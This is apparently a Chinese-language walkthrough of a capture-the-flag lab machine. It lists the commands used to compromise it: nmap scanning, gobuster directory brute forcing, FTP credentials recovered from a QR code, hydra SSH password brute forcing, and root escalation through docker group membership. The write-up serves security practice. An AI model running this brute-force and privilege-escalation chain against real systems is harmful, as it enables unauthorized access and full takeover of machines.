kali：192.168.111.111

靶机：192.168.111.174

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.174

80端口目录爆破，发现文件：hidden_text

gobuster dir -u http://192.168.111.174 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

访问后发现二维码

扫二维码后得到ftp用户名：userftp，密码：ftpp@ssword

在ftp的文件中提示用户名和密码字典

利用提示的用户和密码字典爆破ssh

hydra -l robin -P ./p_lists.txt 192.168.111.174 -s 22 ssh -t 64

提权

robin用户sudo权限

/home/robin/project/feedback.sh文件内容

运行该脚本后切换到用户jerry

sudo -u jerry /home/robin/project/feedback.sh

可以发现jerry处于docker组，提权方法：https://gtfobins.github.io/gtfobins/docker/#shell

提升为root

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

flag